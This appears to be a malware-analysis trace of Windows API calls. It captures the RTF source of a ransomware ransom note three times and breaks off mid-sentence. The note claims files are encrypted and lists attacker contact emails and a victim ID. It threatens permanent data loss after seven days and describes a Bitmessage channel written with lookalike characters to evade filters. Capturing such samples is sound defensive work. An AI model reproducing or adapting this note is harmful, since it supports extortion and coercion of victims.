TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.125] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.125] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 